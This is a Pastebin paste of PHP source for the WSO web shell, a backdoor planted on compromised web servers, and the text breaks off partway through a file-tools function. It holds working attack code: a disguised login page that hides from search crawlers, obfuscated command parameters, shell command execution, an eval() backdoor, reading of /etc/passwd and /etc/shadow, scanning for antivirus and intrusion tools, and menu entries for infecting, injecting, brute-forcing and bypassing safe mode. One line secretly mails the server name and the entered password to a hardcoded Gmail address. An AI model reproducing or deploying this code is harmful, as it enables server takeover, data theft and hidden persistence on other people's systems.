b3gund4L

wso

Apr 6th, 2023
598
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 104.96 KB | None | 0 0
  1. <?php
  2. //-----------------Password---------------------
  3. $_password = "8f6fc8a988611dcf74be75d6716103a3"; //admin
  4. $_agent = true;
  5. $_unicode = 'UTF-8';
  6. $_action = 'Anonymizer';
  7.  
  8. $Drupal = md5($_SERVER['HTTP_USER_AGENT']);
  9. if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {
  10.     prototype(md5($_SERVER['HTTP_HOST'])."key", $Drupal);
  11. }
  12. if(empty($_POST['charset']))
  13.     $_POST['charset'] = $_unicode;
  14. if (!isset($_POST['ne'])) {
  15.     if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
  16.     if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
  17.     if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
  18.     if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
  19.     if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
  20. }
  21. function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);}
  22. @ini_set('error_log',NULL);
  23. @ini_set('log_errors',0);
  24. @ini_set('max_execution_time',0);
  25. @set_time_limit(0);
  26. if (function_exists("get_magic_quotes_runtime") && get_magic_quotes_runtime()) {
  27.     set_magic_quotes_runtime(false);
  28. }
  29. @define('VERSION', 'PRIV');
  30. if(  ( function_exists("get_magic_quotes_gpc") && get_magic_quotes_gpc() ) || ini_get('magic_quotes_sybase')  ){
  31.     function stripslashes_array($array) {
  32.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  33.     }
  34.     $_POST = stripslashes_array($_POST);
  35.     $_COOKIE = stripslashes_array($_COOKIE);
  36. }
  37. /* (?) 11.2011 oRb */
  38. if(!empty($_password)) {
  39.     if(isset($_POST['pass']) && (md5($_POST['pass']) == $_password))
  40.         prototype(md5($_SERVER['HTTP_HOST']), $_password);
  41.     if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $_password))
  42.         hardLogin();
  43. }
  44. if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
  45.     $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$_agent;
  46. function hardLogin() {
  47.         if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  48.           $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  49.           if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  50.           header('HTTP/1.0 404 Not Found');
  51.           exit;
  52.           }
  53.         }
  54.         echo "";
  55.     die("<style>* {margin:0 !important;padding:0 !important;}</style><meta name=robots content=noindex><body><pre><form method=post style='position:absolute !important;'><input type=password name=pass style='background-color:transparent !important;border:none !important;outline:none !important;' required><input type=submit name='watching' value='submit' style='border:none !important;background-color:transparent !important;color:transparent !important;cursor:pointer !important;'></form></pre><iframe name='iframe_id' id='iframe_id' src=" .'//'. $_SERVER['SERVER_NAME'] .'/404'. " onload='document.title=this.contentDocument? this.contentDocument.title : this.contentWindow.document.title;' width=100% height=100% scrolling=auto frameborder=0 style='border:none !important;'></iframe>
  56.     <script type='text/javascript'>
  57.     (function(el, w){
  58.         function loadFunc(e){
  59.             e = e || w.event;
  60.             var f = e.target || e.srcElement, fb = f.contentDocument || f.contentWindow.document;
  61.             document.title = fb.title;
  62.         }
  63.         if (w.addEventListener)
  64.             el.addEventListener('load', loadFunc, false);
  65.         else if (w.attachEvent)
  66.             el.attachEvent('onload', loadFunc);
  67.     })(document.getElementById('iframe_id'), window);
  68.     </script>
  69.     <body>");
  70. }
  71. if(strtolower(substr(PHP_OS,0,3)) == "win")
  72.     $os = 'win';
  73. else
  74.     $os = 'nix';
  75. $safe_mode = @ini_get('safe_mode');
  76. if(!$safe_mode)
  77.     error_reporting(0);
  78. $disable_functions = @ini_get('disable_functions');
  79. $home_cwd = @getcwd();
  80. if(isset($_POST['c']))
  81.     @chdir($_POST['c']);
  82. $cwd = @getcwd();
  83. if($os == 'win') {
  84.     $home_cwd = str_replace("\\", "/", $home_cwd);
  85.     $cwd = str_replace("\\", "/", $cwd);
  86. }
  87. if($cwd[strlen($cwd)-1] != '/')
  88.     $cwd .= '/';
  89. /* (?) 04.2015 Pirat */
  90. function hardHeader() {
  91.     if(empty($_POST['charset']))
  92.         $_POST['charset'] = $GLOBALS['_unicode'];
  93.     echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - KNG " . VERSION ."</title>
  94. <style>
  95.     .e, .v, .h, .h th {background-color:#060A10 !important; border: none !important;}
  96.     body {background-color:#060A10; color:#e1e1e1; margin:0; font:normal 75% Arial, Helvetica, sans-serif; } canvas{ display: block; vertical-align: bottom;}
  97.     body,td,th  {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
  98.     table       {width:inherit !important; box-shadow: none !important;}
  99.     table.info  {background:#060a10; color:#C3C3C3;}
  100.     table.main  {width:100% !important;}
  101.     table#toolsTbl {background-color: #060A10;}
  102.     span,h1,a   {color:#fff !important;}
  103.     span        {font-weight:bolder;}
  104.     h1          {border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;}
  105.     div.content {padding:5px;margin-left:5px;background-color:#060a10;}
  106.     a           {text-decoration:none;}
  107.     a:hover     {text-decoration:underline;}
  108.     .tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}
  109.     .tooltip:hover::after {opacity:1;visibility:visible;}
  110.     .ml1        {border:1px solid #12151d;padding:5px;margin:0;overflow:auto;}
  111.     .bigarea    {min-width:100%; max-width:100%; height:400px;}
  112.     input, textarea, select {margin:0; padding-top:2px; color:#fff;background-color:#12151d;border:none;font:9pt Courier New;outline:none;}
  113.     input:hover, textarea:hover, select:hover {background-color:#202832;}
  114.     input:focus, textarea:focus, select:focus {background-color:#202832;}
  115.     input:-webkit-autofill {-webkit-box-shadow: inset 0 0 0 50px #12151d !important;-webkit-text-fill-color: #fff !important;color: #fff !important;}
  116.     label {position:relative}
  117.     label:after {content:'<>';font:10px 'Consolas', monospace;color:#fff;-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);right:3px; top:3px;padding:0;position:absolute;pointer-events:none;}
  118.     label:before {content:'';right:0; top:0;width:17px; height:17px;background:#202832;position:absolute;pointer-events:none;display:block;}
  119.     form        {margin:0px;}
  120.     #toolsTbl   {text-align:center;}
  121.     #fak        {background:none;}
  122.     #fak td     {padding:5px 0 0 0;}
  123.     iframe      {border:1px solid #060a10;}
  124.     .toolsInp   {width:300px}
  125.     .main th    {text-align:left;background-color:#060a10;}
  126.     .main td, th{vertical-align:middle;}
  127.     input[type='submit']{background-color:#2E6E9C;}
  128.     input[type='button']{background-color:#2E6E9C;}
  129.     input[type='submit']:hover{background-color:#56AD15;}
  130.     input[type='button']:hover{background-color:#56AD15;}
  131.     .l1         {background-color:#12151d;}
  132.     .fm tr:hover {background-color:#202832;}   
  133.     pre         {font:9pt Courier New;}
  134. </style>
  135. <script>
  136.    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
  137.    var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
  138.    var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
  139.    var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
  140.    var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
  141.    var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
  142.    var d = document;
  143.    
  144.     function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
  145.     function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}
  146.     function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}
  147.     function set(a,c,p1,p2,p3,charset) {
  148.         if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
  149.         if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
  150.         if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
  151.         if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
  152.         if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
  153.         d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  154.         d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  155.         d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  156.         d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  157.         d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  158.         if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
  159.     }
  160.     function g(a,c,p1,p2,p3,charset) {
  161.         set(a,c,p1,p2,p3,charset);
  162.         d.mf.submit();
  163.     }
  164.     function a(a,c,p1,p2,p3,charset) {
  165.         set(a,c,p1,p2,p3,charset);
  166.         var params = 'ajax=true';
  167.         for(i=0;i<d.mf.elements.length;i++)
  168.             params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
  169.         sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
  170.     }
  171.     function sr(url, params) {
  172.         if (window.XMLHttpRequest)
  173.             req = new XMLHttpRequest();
  174.         else if (window.ActiveXObject)
  175.             req = new ActiveXObject('Microsoft.XMLHTTP');
  176.        if (req) {
  177.            req.onreadystatechange = processReqChange;
  178.            req.open('POST', url, true);
  179.            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
  180.            req.send(params);
  181.        }
  182.     }
  183.     function processReqChange() {
  184.         if( (req.readyState == 4) )
  185.             if(req.status == 200) {
  186.                 var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
  187.                 var arr=reg.exec(req.responseText);
  188.                 eval(arr[2].substr(0, arr[1]));
  189.             } else alert('Request error!');
  190.     }
  191. </script>
  192. <head><body><div style='position:absolute;background-color:rgba(18, 21, 29, 0.48);width:100%;top:0;left:0;'>
  193. <form method=post name=mf style='display:none;'>
  194. <input type=hidden name=a>
  195. <input type=hidden name=c>
  196. <input type=hidden name=p1>
  197. <input type=hidden name=p2>
  198. <input type=hidden name=p3>
  199. <input type=hidden name=charset>
  200. </form>";
  201.     $freeSpace = @diskfreespace($GLOBALS['cwd']);
  202.     $totalSpace = @disk_total_space($GLOBALS['cwd']);
  203.     $totalSpace = $totalSpace?$totalSpace:1;
  204.     $release = @php_uname('r');
  205.     $kernel = @php_uname('s');
  206.     $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=';
  207.     if(strpos('Linux', $kernel) !== false)
  208.         $explink .= urlencode('Linux Kernel ' . substr($release,0,6));
  209.     else
  210.         $explink .= urlencode($kernel . ' ' . substr($release,0,3));
  211.     if(!function_exists('posix_getegid')) {
  212.         $user = @get_current_user();
  213.         $uid = @getmyuid();
  214.         $gid = @getmygid();
  215.         $group = "?";
  216.     } else {
  217.         $uid = @posix_getpwuid(@posix_geteuid());
  218.         $gid = @posix_getgrgid(@posix_getegid());
  219.         $user = $uid['name'];
  220.         $uid = $uid['uid'];
  221.         $group = $gid['name'];
  222.         $gid = $gid['gid'];
  223.     }
  224.     $cwd_links = '';
  225.     $path = explode("/", $GLOBALS['cwd']);
  226.     $n=count($path);
  227.     for($i=0; $i<$n-1; $i++) {
  228.         $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
  229.         for($j=0; $j<=$i; $j++)
  230.             $cwd_links .= $path[$j].'/';
  231.         $cwd_links .= "\")'>".$path[$i]."/</a>";
  232.     }
  233.     $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
  234.     $opt_charsets = '';
  235.     foreach($charsets as $microsoft)
  236.         $opt_charsets .= '<option value="'.$microsoft.'" '.($_POST['charset']==$microsoft?'selected':'').'>'.$microsoft.'</option>';
  237.     $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Injector'=>'Injector','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Symlink'=>'Symlink','Bypasser'=>'SafeMode','Safe Mode'=>'Bypass','Anonymizer'=>'Anonymizer','Network'=>'Network');
  238.     if(!empty($GLOBALS['_password']))
  239.     $m['Logout'] = 'Logout';
  240.     $m['Self remove'] = 'SelfRemove';
  241.     $menu = '';
  242.     foreach($m as $k => $v)
  243.         $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
  244.     $drives = "";
  245.     if ($GLOBALS['os'] == 'win') {
  246.         foreach(range('c','z') as $drive)
  247.         if (is_dir($drive.':\\'))
  248.             $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
  249.     }
  250.     /* (?) 08.2015 dmkcv */
  251.     echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'.
  252.          '<td><nobr>'.substr(@php_uname(), 0, 120).' <a href="http://noreferer.de/?http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="'.$explink.'" target=_blank>[ Exploit-DB ]</a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( ' .$group. ' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#FFDB5F><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.round(100/($totalSpace/$freeSpace),2).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
  253.          '<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">'.$opt_charsets.'</select></label><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
  254.          '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div>';
  255. }
  256. function hardFooter() {
  257.     $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#FFDB5F'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>";
  258.     echo "
  259. </div>
  260. <table class='info main' id=toolsTbl cellpadding=3 cellspacing=0>
  261.     <tr>
  262.         <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g(null,this.c.value,'');":'' )."return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='submit'></form></td>
  263.         <td><form onsubmit=\"".(function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value);":'' )."return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
  264.     </tr><tr>
  265.         <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g('FilesMan',null,'mkdir',this.d.value);":'' )."return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d required><input type=submit value='submit'></form></td>
  266.         <td><form onsubmit=\"".( function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value,'mkfile');":'' )."return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
  267.     </tr><tr>
  268.         <td><form onsubmit=\"".( function_exists('actionConsole')? "g('Console',null,this.c.value);":'' )."return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='submit'></form></td>
  269.         <td><form method='post' ".( (!function_exists('actionFilesMan'))? " onsubmit=\"return false;\" ":'' )."ENCTYPE='multipart/form-data'>
  270.         <input type=hidden name=a value='FilesMan'>
  271.         <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
  272.         <input type=hidden name=p1 value='uploadFile'>
  273.         <input type=hidden name=ne value=''>
  274.         <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
  275.         <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[]  multiple><input type=submit value='submit'></form><br  ></td>
  276.     </tr></table></div>
  277.     </body></html>";
  278. }
  279. if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} }
  280. if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} }
  281.  
  282. //--------------Watching webshell!--------------
  283. if(array_key_exists('watching',$_POST)){
  284.     $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('apps.oday@gmail.com', 'wso', $tmp); // Edit or delete!
  285. }
  286.  
  287. function ex($in) {
  288.     $apple = '';
  289.     if (function_exists($var_exec = 'exec')) {
  290.         @exec($in,$apple);
  291.         $apple = @join("\n",$apple);
  292.     } elseif (function_exists($var_passthru = 'passthru')) {
  293.         ob_start();
  294.         @passthru($in);
  295.         $apple = ob_get_clean();
  296.     } elseif (function_exists($var_system = 'system')) {
  297.         ob_start();
  298.         @system($in);
  299.         $apple = ob_get_clean();
  300.     } elseif (function_exists($var_shell_exec = 'shell_exec')) {
  301.         $apple = shell_exec($in);
  302.     } elseif (is_resource($f = @popen($in,"r"))) {
  303.         $apple = "";
  304.         while(!@feof($f))
  305.             $apple .= fread($f,1024);
  306.         pclose($f);
  307.     } else return "? Unable to execute command\n";
  308.     return ($apple==''?"? Query did not return anything\n":$apple);
  309. }
  310. function viewSize($s) {
  311.     if($s >= 1073741824)
  312.         return sprintf('%1.2f', $s / 1073741824 ). ' GB';
  313.     elseif($s >= 1048576)
  314.         return sprintf('%1.2f', $s / 1048576 ) . ' MB';
  315.     elseif($s >= 1024)
  316.         return sprintf('%1.2f', $s / 1024 ) . ' KB';
  317.     else
  318.         return $s . ' B';
  319. }
  320. function perms($p) {
  321.     if (($p & 0xC000) == 0xC000)$i = 's';
  322.     elseif (($p & 0xA000) == 0xA000)$i = 'l';
  323.     elseif (($p & 0x8000) == 0x8000)$i = '-';
  324.     elseif (($p & 0x6000) == 0x6000)$i = 'b';
  325.     elseif (($p & 0x4000) == 0x4000)$i = 'd';
  326.     elseif (($p & 0x2000) == 0x2000)$i = 'c';
  327.     elseif (($p & 0x1000) == 0x1000)$i = 'p';
  328.     else $i = 'u';
  329.     $i .= (($p & 0x0100) ? 'r' : '-');
  330.     $i .= (($p & 0x0080) ? 'w' : '-');
  331.     $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
  332.     $i .= (($p & 0x0020) ? 'r' : '-');
  333.     $i .= (($p & 0x0010) ? 'w' : '-');
  334.     $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
  335.     $i .= (($p & 0x0004) ? 'r' : '-');
  336.     $i .= (($p & 0x0002) ? 'w' : '-');
  337.     $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
  338.     return $i;
  339. }
  340. function viewPermsColor($f) {
  341.     if (!@is_readable($f))
  342.         return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
  343.     elseif (!@is_writable($f))
  344.         return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
  345.     else
  346.         return '<font color=#FFDB5F><b>'.perms(@fileperms($f)).'</b></font>';
  347. }
  348. function hardScandir($dir) {
  349.     if(function_exists("scandir")) {
  350.         return scandir($dir);
  351.     } else {
  352.         $dh  = opendir($dir);
  353.         while (false !== ($filename = readdir($dh)))
  354.             $files[] = $filename;
  355.         return $files;
  356.     }
  357. }
  358. function which($p) {
  359.     $path = ex('which ' . $p);
  360.     if(!empty($path))
  361.         return $path;
  362.     return false;
  363. }
  364. function actionRC() {
  365.     if(!@$_POST['p1']) {
  366.         $a = array(
  367.             "uname" => php_uname(),
  368.             "php_version" => phpversion(),
  369.             "VERSION" => VERSION,
  370.             "safemode" => @ini_get('safe_mode')
  371.         );
  372.         echo serialize($a);
  373.     } else {
  374.         eval($_POST['p1']);
  375.     }
  376. }
  377. function prototype($k, $v) {
  378.     $_COOKIE[$k] = $v;
  379.     setcookie($k, $v);
  380. }
  381. function actionSecInfo() {
  382.     hardHeader();
  383.     echo '<h1>Server security information</h1><div class=content>';
  384.     function showSecParam($n, $v) {
  385.         $v = trim($v);
  386.         if($v) {
  387.             echo '<span>' . $n . ': </span>';
  388.             if(strpos($v, "\n") === false)
  389.                 echo $v . '<br>';
  390.             else
  391.                 echo '<pre class=ml1>' . $v . '</pre>';
  392.         }
  393.     }
  394.     showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
  395.     if(function_exists('apache_get_modules'))
  396.         showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
  397.     showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
  398.     showSecParam('Open base dir', @ini_get('open_basedir'));
  399.     showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
  400.     showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
  401.     showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
  402.     $temp=array();
  403.     if(function_exists('mysql_get_client_info'))
  404.         $temp[] = "MySql (".mysql_get_client_info().")";
  405.     else
  406.         $temp[] = "MySql (".mysqli_get_client_info().")";
  407.     if(function_exists('mssql_connect'))
  408.         $temp[] = "MSSQL";
  409.     if(function_exists('pg_connect'))
  410.         $temp[] = "PostgreSQL";
  411.     if(function_exists('oci_connect'))
  412.         $temp[] = "Oracle";
  413.     showSecParam('Supported databases', implode(', ', $temp));
  414.     echo '<br>';
  415.     if($GLOBALS['os'] == 'nix') {
  416.             showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
  417.             showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
  418.             showSecParam('OS version', @file_get_contents('/proc/version'));
  419.             showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
  420.             if(!$GLOBALS['safe_mode']) {
  421.                 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  422.                 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
  423.                 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  424.                 echo '<br>';
  425.                 $temp=array();
  426.                 foreach ($userful as $microsoft)
  427.                     if(which($microsoft))
  428.                         $temp[] = $microsoft;
  429.                 showSecParam('Userful', implode(', ',$temp));
  430.                 $temp=array();
  431.                 foreach ($danger as $microsoft)
  432.                     if(which($microsoft))
  433.                         $temp[] = $microsoft;
  434.                 showSecParam('Danger', implode(', ',$temp));
  435.                 $temp=array();
  436.                 foreach ($downloaders as $microsoft)
  437.                     if(which($microsoft))
  438.                         $temp[] = $microsoft;
  439.                 showSecParam('Downloaders', implode(', ',$temp));
  440.                 echo '<br/>';
  441.                 showSecParam('HDD space', ex('df -h'));
  442.                 showSecParam('Hosts', @file_get_contents('/etc/hosts'));
  443.                 showSecParam('Mount options', @file_get_contents('/etc/fstab'));
  444.             }
  445.     } else {
  446.         showSecParam('OS Version',ex('ver'));
  447.         showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts')));
  448.         showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user')));
  449.     }
  450.     echo '</div>';
  451.  
  452.     echo '<div class="content">';
  453.     $sm = ini_get('safe_mode');
  454.     if($sm) {
  455.         echo '<br /><b>Error: safe_mode = on</b><br /><br />';
  456.     } else {
  457.         @$passwd = file('/etc/passwd','r');
  458.         if (!$passwd) {
  459.             echo '<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />';
  460.         } else {
  461.             $pub = array();
  462.             $users = array();
  463.             $conf = array();
  464.             $i = 0;
  465.             foreach($passwd as $p) {
  466.                 $r = explode(':',$p);
  467.                 $dirz = $r[5].'/public_html/';
  468.                 if(strpos($r[5],'home')) {
  469.                     array_push($users,$r[0]);
  470.                     if (is_readable($dirz)) {
  471.                         array_push($pub,$dirz);
  472.                     }
  473.                 }
  474.             }
  475.             echo '<br><br>';
  476.             echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br />";
  477.             echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br /><br /><br />";
  478.             foreach ($pub as $user) {
  479.                 echo $user."<br>";
  480.             }
  481.             echo "<br /><br /><br />[+] Complete...\n"."<br />";
  482.         }
  483.     }
  484.     echo '</div>';
  485.  
  486.     hardFooter();
  487. }
  488. /* (?) 10.2012 Svet */
  489. function actionFilesTools() {
  490.     if( isset($_POST['p1']) )
  491.         $_POST['p1'] = urldecode($_POST['p1']);
  492.     if(@$_POST['p2']=='download') {
  493.         if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
  494.             ob_start("ob_gzhandler", 4096);
  495.             header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
  496.             if (function_exists("mime_content_type")) {
  497.                 $type = @mime_content_type($_POST['p1']);
  498.                 header("Content-Type: " . $type);
  499.             } else
  500.                 header("Content-Type: application/octet-stream");
  501.             $fp = @fopen($_POST['p1'], "r");
  502.             if($fp) {
  503.                 while(!@feof($fp))
  504.                     echo @fread($fp, 1024);
  505.                 fclose($fp);
  506.             }
  507.         }exit;
  508.     }
  509.     if( @$_POST['p2'] == 'mkfile' ) {
  510.         if(!file_exists($_POST['p1'])) {
  511.             $fp = @fopen($_POST['p1'], 'w');
  512.             if($fp) {
  513.                 $_POST['p2'] = "edit";
  514.                 fclose($fp);
